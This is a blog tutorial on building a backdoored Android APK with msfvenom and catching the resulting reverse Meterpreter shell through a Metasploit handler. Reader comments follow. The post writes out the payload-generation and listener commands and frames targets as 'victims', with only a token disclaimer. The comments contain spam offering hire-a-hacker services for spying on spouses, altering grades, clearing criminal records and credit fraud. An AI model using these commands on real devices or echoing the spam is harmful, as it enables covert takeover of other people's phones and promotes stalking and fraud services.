How to Hack Android Smartphone Using Metasploit

Hack Android Smartphone Using Metasploit

Hello friends how are you? I hope everything is going great 😀 so what we will be talking about today is Hack Android Smartphone using Metasploit.

Important: All the details shown in the article are only for educational purposes and we are not responsible for any of your acts.

Why Hack Android Phones?

So the first question that comes to our mind after hearing this is why in the world we would like to hack Android Phones? The answer to that question is really simple majority of the people out there are Android users and you have a lot of victims to target 😀

But seriously don’t hack anyone’s device without their permission or you can get into a lot of trouble for doing android hacking.

What is Android?

According to Wikipedia:

Android is an operating sysytem based on Linux Kernel, and designed promarily for touchcreen mobile devices such as smartphones and tablet computers.

Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices

What is Metasploit?

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby.

To put it in simple words it is an Open Source Framework, a tool for creating exploits for the remote victims and it also has a whole list of exploits readily available in Metasploit Framework.

It is the favorite tools for security researchers and ethical hackers to perform their attacks. It is super simple to create different payloads for different Operating Systems and platforms.

Metasploit for Android Hacking?

What method will be using to hack the phone? We are going to create Backdoor and install that on Victims Phone.

What is Backdoor?

A Backdoor is a method or a way of bypassing authentication in the product, computer etc. They are usually used for unauthorized access to a computer.

For Android, we are going to create an APK file with a backdoor in it. Android Application Package (APK) is the file format used to distribute and install application software onto the Google’s Android OS. It is similar to the MSI package or a Deb package in Linux based operating system.


  1. Metasploit Framework (Pre-Installed on Kali Linux)
  2. Victims Android Smartphone (Unfortunately that is my phone)

Steps To Hack Android SmartPhone Using Metasploit:

So now lets get into it.

  1. Open Terminal.
  2. We are going to use Metasploit Venom Framework to create the exploit/backdoor for this tutorial.
  3. Use this command to generate the exploit/Backdoor for the victim.
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk

Generate Android Payload using msfvenom

Let me explain the above Command so we are using msfvenom as the exploit generator for an android using Meterpreter for the reverse connection to the attacker’s system. LHOST defines the attackers IP address where he will get the reverse connection from the victim. And same with the LPORT connection will be made on port 4444 and R > is used to generate the executable.

MSFVenom Payload

Now we are all ready for the next step as this payload use reverse_tcp so the attacker will be listening to the port specified in the payload for a reverse connection from the victim.

So now we need to set up a handler to handle incoming connections to the port let’s do it.

[email protected]:~/# msfconsole

use exploit/multi/handler set payload android/meterpreter/reverse_tcp

Now we will see any open connections, on attacker’s device.

set lhost set lport 4444 exploit 

Remember that the LHOST & LPORT are going to be the attacker IP address and port to listen to the reverse connection. and exploit to start listening.

Now as soon as the attacker installs the APK exploit/backdoor you will get the reverse meterpreter session on you terminal like this.

Here we have some information that we have extracted from the Android system so the victim’s phone have been completely owned.

Finally, The successful hack dance  😈  😈


So after all this explain what we have learned is never install apps from unknown sources 😀 or else you are completely screwed :3

As a result, If you still have any confusions or any problem, you can check the video tutorial.


Do you like the tutorial on Hack Android Smartphone using Metasploit? Share this article with your friends.

Visit our HomePage for more Hacking Tutorials, Updates and more.

  • Pingback: Top Kali Linux Tools Every Hacker Should Know About and Learn – Cyber Security Training & Ethical Hacking()

  • Pingback: New Metasploit Commands 2017 ( Improve Efficiency )()

  • Kitty

    Hey.. I installed the backdoor on my phone but nothing happened. What could be the problem?

    • just check if you have correctly set up the kali machine i on the backdoor and is the mobile on the same network because this tutorial is only for local network

      • ocierus

        when i send myself the apk it is txt, not exe

  • Nelly Benson

    I spend months wondering if their are any real hacker’s, I got scared by all the news of scammer’s pretending to be hackers online, however I found a solution to that a few days ago, I contacted , (cyberwebkey484(at)gmail(dot)com) after I read about his job qualities on a group page, , (cyberwebkey484(at)gmail(dot)com) helped me defend my social media against hackers, , (cyberwebkey484(at)gmail(dot)com) has been my personal firewall after he made my Email and other platform like my facebook impossible to hack, he also gave advice that works with my credit score, I think , (cyberwebkey484(at)gmail(dot)com) is the complete full package, contact him if you need some cyberweb protection, thank me later

  • Pingback: Complete How to Guide for MSFvenom – Ethical Hacking Tutorials, Tips And Tricks()

  • Black Jack

    Hi there. I am learning about ethical hacking and love your articles. I am SUPER new to all this and have the Oracle Vm with Kali and have followed your tutorial with my own Samsung device to see how it works. When I get to the exploit stage it simply stays on the screen immediately following > exploit. Nothing seems to happen and I am wondering if it is because I haven’t got a USB wireless wifi device? I have followed a few tutorials that say Kali wont connect to my computers wireless card and I need to buy an external usb wireless adapter?? IS this maybe the issue?

    • Wanda anderson

      How To Hack Facebook and See Who’s Stalking You – Clayton Wood

  • sommer

    If you need to hack into any phone or computer, monitor someone’s communications like calls text, WhatsApp twitter, snapchat, Facebook, database, delete record, monitoring your spouse’s cheating activities, improve credit score, retrieve or spy on your partners whatsapp, text, phone, emails, bank account and many more… Just contact [email protected], he is reliable and efficient

  • LeighAnn Harkins

    Hello if you need the help of an ethical hacker urgently contact [email protected] he is the best when it comes to hacking of 1-DATABASE HACK 2-WHATS-APP HACK 3-WEBSITE HACK 4-TRACKING CALLS 5-PHONE CLONE 6-FACEBOOK HACK 7-CHANGE SCHOOL GRADE [email protected] helped me hack into my spouse phone and he was excellent in hacking my husband’s phone without physical contact.

  • Solzy

    nice ..!

  • Not Bob Dillon

    Hey mate, I just went through your whole tutorial up until the end part where I put in the exploit command and it came back saying “Handler failed to bind to (my ip address):1234:- –
    Then “Started reverse TCP handler on” I have no idea what that means so if you can send a reply with some help, I would much appreciate that. TY dude

  • Not Bob Dillon

    Okay, so I fixed my earlier problem and have a new one, when I use the exploit command it does all the right things but doesn’t give me the option to write any commands and when I do try to type something it says unknown command and goes back to the “msf exploit(handler)” console, I have no idea what to do and would appreciate some help this time. Ty dude

    • team members

      use this command “session -i” to see all active sessions that how many times app is opened.
      After that use “session -1”
      now u will get meterpreter session

  • sara johnson

    Hello if you need a hacker to figure out who your spouse really is contact certifiednewhacker1269atgmaildot com he has the key to your problem he helped me catch my cheating husband

  • Jean owen

    Need a hacker for general or specialized hacks, hack into email accounts(gmail, yahoo, aol etc.), gain access to various social networks (such as facebook, twitter, instagram, badoo etc.), specialized and experienced hacking into educational institutions, change of grades, clearing of criminal records, credit score records, smartphone hack. contact us via [email protected] or text him on +1(916) 6742172 .

  • Yansee

    I need to hack a remote smartphone, is there someone here offering this service, many thanks.

  • Adam Logan

    [email protected] has been my greatest solution.
    Great Hacker!!
    Just rounded up my job, can’t keep this to myself. He offers the following services:
    Cloning(cell phone clone)
    Password Harvesting(emails, facebook, instagram, snapchat..etc)
    Hacking(whatsapp, imo, kik…etc)
    Credit Score top up
    DMV records adjustment
    Adjustments of school grades
    Tracking locations
    MTCN generation
    Website breach
    Retrieving of deleted texts
    Adding of names to guest list.

    You can email him or chat/call him on google hangout, he will respond almost immediately.-

  • vamsi

    It is getting permission

    • Have u given storage permission to this terminal app ?

  • Francisco

    Nice post! How do you do when your Kali host IP is in a different network segment than the victim? i.e You are running Kali as VM with NAT as network mode, the segment of the NAT is different from the Local segment.